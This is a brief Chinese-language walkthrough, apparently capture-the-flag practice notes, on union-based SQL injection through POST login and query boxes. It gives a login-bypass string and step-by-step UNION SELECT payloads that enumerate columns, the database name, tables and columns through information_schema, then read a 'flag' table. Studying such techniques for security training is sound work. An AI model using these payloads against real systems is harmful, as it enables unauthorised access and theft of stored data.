POST注入高危点:登录框、查询框、等各种和数据库有交互的框
1、判断是否存在sql注入先用万能密码登陆试试看 ' or 1=1 -- qwe
2、 登陆成功证明存在sql注入,下面在判断字段数 ' or 1=1 order by 3 -- qwe 1到3返回正常 4返回错误
3、 现在在判断回显点 ' and 1=1 union select 1,2,3 -- qwe 回显点是2,3
4、查询当前数据库名 ' and 1=1 union select 1,2,database() -- qwe
5、查询数据库表名
' and 1=1 union select 1,2,table_name from information_schema.tables where table_schema=database() limit 0,1 -- qwe
6、 查询字段名
' and 1=1 union select 1,2,column_name from information_schema.columns where table_schema=database() and table_name='flag' limit 0,1 -- qwe
7、获取数据
' and 1=1 union select 1,2,flag from flag limit 0,1 -- qwe